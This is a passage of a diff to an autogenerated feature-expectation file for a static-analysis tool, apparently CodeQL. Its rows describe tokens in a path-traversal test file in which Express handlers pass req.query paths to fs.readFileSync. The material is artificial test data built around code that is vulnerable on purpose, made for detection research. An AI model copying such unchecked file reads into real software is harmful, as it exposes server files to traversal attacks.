rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:22 | req.query | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:22 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:27 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:27 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:27 | req.query.path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:27 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:27 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:18:377:22 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:18:377:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:18:377:22 | query | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:18:377:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:18:377:22 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:24:377:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:24:377:27 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:24:377:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:24:377:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:24:377:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:379:3:379:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:379:6:379:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:379:6:379:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:379:6:379:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:379:6:379:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:379:6:379:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | calleeImports | fs | @@ -9633,6 +79182,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:379:19:379:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | exceptional return of fs.read ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | exceptional return of fs.read ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | fs.read ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | fs.read ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | fs.read ... (path)) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | fs.read ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:3:381:30 | fs.read ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:6:381:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:6:381:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:381:6:381:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:6:381:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:6:381:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:23 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:23 | slash | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:23 | slash | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:23 | slash | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:23 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | exceptional return of slash(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | exceptional return of slash(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | exceptional return of slash(path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | exceptional return of slash(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | exceptional return of slash(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | slash(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | slash(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:381:19:381:29 | slash(path) | calleeImports | fs | @@ -9650,6 +79234,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:381:25:381:28 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | | autogenerated/TaintedPath/normalizedPaths.js:381:25:381:28 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:381:25:381:28 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:384:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:1:404:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:5:384:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:5:384:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:5:384:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | calleeImports | express | @@ -9657,6 +79256,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:384:9:384:24 | '/dotdot-regexp' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:384:26 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | calleeImports | express | @@ -9664,11 +79278,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | (req, r ... K\\n }\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:27:404:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:28:384:30 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:384:33:384:35 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:384:33:384:35 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:384:33:384:35 | res | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:384:33:384:35 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:384:33:384:35 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:10 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path = ... uery.x) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path = ... uery.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path = ... uery.x) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path = ... uery.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:7:385:46 | path = ... uery.x) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | exceptional return of pathMod ... uery.x) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | exceptional return of pathMod ... uery.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | exceptional return of pathMod ... uery.x) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | exceptional return of pathMod ... uery.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | exceptional return of pathMod ... uery.x) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:385:25:385:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| 